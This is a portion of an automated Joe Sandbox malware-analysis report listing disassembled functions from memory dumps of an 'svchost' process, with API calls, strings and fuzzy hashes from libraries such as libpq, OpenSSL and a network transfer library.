                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: malloc$ErrorLastStartupmemset
                          • String ID:
                          • API String ID: 4264553866-3916222277
                          • Opcode ID: 81dba184a20681d5168ef095bce935bd882ab3235e0eb984ab4d8f4362180f30
                          • Instruction ID: 190f9a20f73a38f76dbf4b04167352b7ccaa33886781794dc1844a094adf740c
                          • Opcode Fuzzy Hash: 81dba184a20681d5168ef095bce935bd882ab3235e0eb984ab4d8f4362180f30
                          • Instruction Fuzzy Hash: A7418571B0AB8186F7958F20E4793A933A6FB45B48F440638DE4D6A3DADFBE9144C314
                          Function 00007FFDA5576540 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$connect
                          • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                          • API String ID: 375857812-3816509080
                          • Opcode ID: 81808cecde148e0314505d5bbdb3587760bc8037fb71c53ef54272281857020f
                          • Instruction ID: 68cf9399ccc9b1b4e16a39543cc9b25698a9e3e047f287bb4bf1c5cde9dc0b90
                          • Opcode Fuzzy Hash: 81808cecde148e0314505d5bbdb3587760bc8037fb71c53ef54272281857020f
                          • Instruction Fuzzy Hash: 4C619E6AB0D68A81EB16DF25D8243F92761AF46FA4F444631DE2D0B7D6DF28E445C308
                          Function 00007FFD942EE5D4 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: d8c9c720c423dd0fb7c7fdef2e919f46d25ae73476d54887143296ce2eb2440e
                          • Instruction ID: 6591b5bd9dbe61a96c4cb36d7f6457e62bc6472627600f3bddf59e52ee78ad2e
                          • Opcode Fuzzy Hash: d8c9c720c423dd0fb7c7fdef2e919f46d25ae73476d54887143296ce2eb2440e
                          • Instruction Fuzzy Hash: 5DC1C522B0C78681E7709B9594A42BF7791FB82B80F558235EA4D0B7A3DF7EE845C701
                          Function 00007FFDA3794380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c, xrefs: 00007FFDA37943DD
                          • (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D, xrefs: 00007FFDA37943E4
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: Last$CreateErrorFileStatus_wassert
                          • String ID: (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D$D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c
                          • API String ID: 4152205889-1407915
                          • Opcode ID: 13428a4a084adc298e55a553be0c416b07cc18ad2ad40da243f3966190fd6d86
                          • Instruction ID: 02e541594a3e83cd16ad9c7177b9199b1ac2ea75d271edcbfbfe2939b68fe04c
                          • Opcode Fuzzy Hash: 13428a4a084adc298e55a553be0c416b07cc18ad2ad40da243f3966190fd6d86
                          • Instruction Fuzzy Hash: F2413C32B0966586F7609B64E8123BE3592F744774F400334DA6E537D2DE7ED8848748
                          Function 00007FFDA37936A0 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$CloseHandleLastStatus
                          • String ID:
                          • API String ID: 573794993-0
                          • Opcode ID: 01925ca212a3f11562ca6d029b4d52a2f766c3a2ff5ed6290fc74fb45a60b174
                          • Instruction ID: 0ca386779417fb41dad14e21a3002938e0fb67cc70c6f17a31cc61c753baba90
                          • Opcode Fuzzy Hash: 01925ca212a3f11562ca6d029b4d52a2f766c3a2ff5ed6290fc74fb45a60b174
                          • Instruction Fuzzy Hash: F331E765B0964286F3A09F25ACA02793362BF58774F504334EA3D937D2DF3DE4908758
                          Function 00007FFD942E7110 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32 ref: 00007FFD942E711F
                          • SetLastError.KERNEL32 ref: 00007FFD942E713E
                          • FlsSetValue.KERNEL32 ref: 00007FFD942E7167
                          • FlsSetValue.KERNEL32 ref: 00007FFD942E7178
                          • FlsSetValue.KERNEL32 ref: 00007FFD942E7189
                            • Part of subcall function 00007FFD942E6D40: HeapFree.KERNEL32(?,?,17AB402583480000,00007FFD942F2CFA,?,?,?,00007FFD942F3077,?,?,00000000,00007FFD942F1E21,?,?,00007FFD942E6A0E,00007FFD942F1D53), ref: 00007FFD942E6D56
                            • Part of subcall function 00007FFD942E6D40: GetLastError.KERNEL32(?,?,17AB402583480000,00007FFD942F2CFA,?,?,?,00007FFD942F3077,?,?,00000000,00007FFD942F1E21,?,?,00007FFD942E6A0E,00007FFD942F1D53), ref: 00007FFD942E6D60
                          • SetLastError.KERNEL32 ref: 00007FFD942E71AC
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: a563aec71d00df217e2d32d98fb9186aed5d26dbd20ef52b5e1b2d1812bed9e4
                          • Instruction ID: 6bc070dad67140ea4c025c1f01ca91d928b10edc880af858ca835d019d242c32
                          • Opcode Fuzzy Hash: a563aec71d00df217e2d32d98fb9186aed5d26dbd20ef52b5e1b2d1812bed9e4
                          • Instruction Fuzzy Hash: CF112B20B0824241FA7867F1A9B917B1252BF87790F54C635D96E5B7C7DE2EE841D300
                          Function 00007FFDA33872F1 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_zallocR_newR_set_debugR_set_error
                          • String ID: ssl\record\methods\tls_common.c$tls_new_record_layer
                          • API String ID: 3755831613-2134088818
                          • Opcode ID: fe661f9baf099ed6a079c9f3ac4262f3b5fd60779bfcbd9a632273df75bf4176
                          • Instruction ID: 139edc2f3e37889c7f08ae5c66f2a7ccea30e7d9a680771e50050d0206661920
                          • Opcode Fuzzy Hash: fe661f9baf099ed6a079c9f3ac4262f3b5fd60779bfcbd9a632273df75bf4176
                          • Instruction Fuzzy Hash: 92513A3660EFC186D3A0DB55E8902AAB7A6F788790F100136EACD53B5ADF3DD591CB04
                          Function 00007FFDA3782E10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA3782E24
                            • Part of subcall function 00007FFDA378C3B0: Sleep.KERNEL32(?,?,?,00007FFDA3782E38,?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA378C3D2
                            • Part of subcall function 00007FFDA378C3B0: InitializeCriticalSection.KERNEL32(?,?,?,00007FFDA3782E38,?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA378C3F0
                            • Part of subcall function 00007FFDA378C3B0: EnterCriticalSection.KERNEL32(?,?,?,00007FFDA3782E38,?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA378C406
                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,00007FFDA3782C5E,?,?,?,00007FFDA3771068), ref: 00007FFDA3782E4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterErrorInitializeLastSleepgetenv
                          • String ID: /share/locale$PGLOCALEDIR$libpq-16
                          • API String ID: 4109591470-900106006
                          • Opcode ID: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
                          • Instruction ID: cc34501d5255783f29028543d025bfb7df125153db7a475038f65c242ce44f81
                          • Opcode Fuzzy Hash: b028873d0fdef3fab30be0700722ad3c4eb28da0254eb6363c39a8684a7feb72
                          • Instruction Fuzzy Hash: 0401FF50F0F68392FE509B14BCB51B537A2AF59305F840136D14E66753EE2EE985C748
                          Function 00007FFDA557ADE0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 232COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: haproxy protocol not support with SSL encryption in place (QUIC?)$unsupported transport type %d
                          • API String ID: 0-551583306
                          • Opcode ID: a2e125e8056a15029dbd4818e3b0156752fb1dd14fe124f35d3223dcfba5b452
                          • Instruction ID: f6d5215194ad93a045263ffa8fc2d9f061ea0ce4ec71db4540b92882ed743bad
                          • Opcode Fuzzy Hash: a2e125e8056a15029dbd4818e3b0156752fb1dd14fe124f35d3223dcfba5b452
                          • Instruction Fuzzy Hash: 64A19C6AB0E38A85FB66CF25D4643792BA1AB46F94F484831DE4D47386EF3DE441C708
                          Function 00007FFDA55C1D10 Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: callocfree
                          • String ID:
                          • API String ID: 306872129-0
                          • Opcode ID: 440052d8aa252fc403e1b18fb0074ef3cf7239a02d1e66a828f150907f6617e9
                          • Instruction ID: 23c02f4dd58f31fbc6496d8d961764350bd0035fc9b21b864d937e7f42137752
                          • Opcode Fuzzy Hash: 440052d8aa252fc403e1b18fb0074ef3cf7239a02d1e66a828f150907f6617e9
                          • Instruction Fuzzy Hash: 0C617A32606BC185E302CF34D4583DA36A0EB46BACF480338DAA94F7DADFB99044C765
                          Function 00007FFDA55BABE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59stringwindowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: FormatMessagestrchrwcstombs
                          • String ID: Unknown error
                          • API String ID: 4171340688-83687255
                          • Opcode ID: d63315eb628f02752e1d799c39d56083ab3544685e630d18f0dd8773cc4336b0
                          • Instruction ID: cb95a534138bb18fa7249b478754e35165aecd3209cd8ce3b8932d59c7943ec2
                          • Opcode Fuzzy Hash: d63315eb628f02752e1d799c39d56083ab3544685e630d18f0dd8773cc4336b0
                          • Instruction Fuzzy Hash: C821982671D7C586EB338F24E8583696790AF8AF94F494230DA9D077C6EF7CD4448718
                          Function 00007FFD942ECFE8 Relevance: 6.2, APIs: 4, Instructions: 229COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FFD942F8C55,?,00007FFD942CA8D5,?), ref: 00007FFD942ED106
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 4989929f418510be00eaad4ba0abfe9a455c1d8ff00d167898f5db528b5556ad
                          • Instruction ID: 5f43c5fa63b86a7f06aeb351dc595c164bdb27d47511c399950dc104a2ea5541
                          • Opcode Fuzzy Hash: 4989929f418510be00eaad4ba0abfe9a455c1d8ff00d167898f5db528b5556ad
                          • Instruction Fuzzy Hash: 1491B362F3875285FB74DBA594E06BF27A0BB56B88F448135DE0E67687CE3AE445C300
                          Function 00007FFDA333EE40 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00007FFDA3353F40: ENGINE_finish.LIBCRYPTO-3-X64(?,00007FFDA333EE67,?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA3353F72
                          • ERR_set_mark.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE6C
                          • OBJ_nid2sn.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE73
                          • EVP_CIPHER_fetch.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE81
                          • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,00007FFDA332F901,?,?,?,?,?,00007FFDA3327023), ref: 00007FFDA333EE89
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: E_finishJ_nid2snR_fetchR_pop_to_markR_set_mark
                          • String ID:
                          • API String ID: 3538331334-0
                          • Opcode ID: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                          • Instruction ID: 6c2f5160d8937e116d80955e8fba28b4f2ce4e2d4abfb83f1dc352ea0030accf
                          • Opcode Fuzzy Hash: 0927e5fbf129b9b27b48d1e726e7108ff00c565c336dec268f6d8413cdae8668
                          • Instruction Fuzzy Hash: 66F0A012F0EB8202E944B762746516D95539F98BC0F088838FE4D67B9BEE2EE8410308
                          Function 00007FFDA55CC9C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                          • API String ID: 0-3791222319
                          • Opcode ID: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                          • Instruction ID: 171f72810d4e27c2b757d771621513500b6443285c7f989378c1070174215bea
                          • Opcode Fuzzy Hash: e24ff53aba0dff93155571de1f8b73ad3d7d0d7574eac73b64d0d30358c8a112
                          • Instruction Fuzzy Hash: 2241D339B0E64A81EA21CE2695243796690AF43FE8F548630DE7D07BD7EF3DE0418708
                          Function 00007FFD942464F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                          • String ID: x543664
                          • API String ID: 2371198981-674063047
                          • Opcode ID: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                          • Instruction ID: 62d78ff30dabd57abd03ccedc7599697f146824d0058e5f5c02738b5ece406c7
                          • Opcode Fuzzy Hash: ff84634ca94604e23106da7364d75e2a8d33db04dc11fb5fd61d0feea1d68e3b
                          • Instruction Fuzzy Hash: D431A062F05B4181EA29DBA5D1A03682290FF56BF4F248731DA7D426D6EE7ED4D2C340
                          Function 00007FFDA37765B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: FolderPathmemset
                          • String ID: %s/postgresql
                          • API String ID: 2932979005-376571750
                          • Opcode ID: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                          • Instruction ID: 464c74d7c3bc94afe72dadee665fd8383c7ebb9ec214d9367e105aece292d3db
                          • Opcode Fuzzy Hash: a8fce3c0427880ed849f8b9a4333abb74a1f45ffb7affd3f26d277be77a27f7c
                          • Instruction Fuzzy Hash: 1001FC32B2DA8182EBB08B21F461BFA7362EB88784F805131D94D17B46CE3DD005CB04
                          Function 00007FFDA5579BC0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
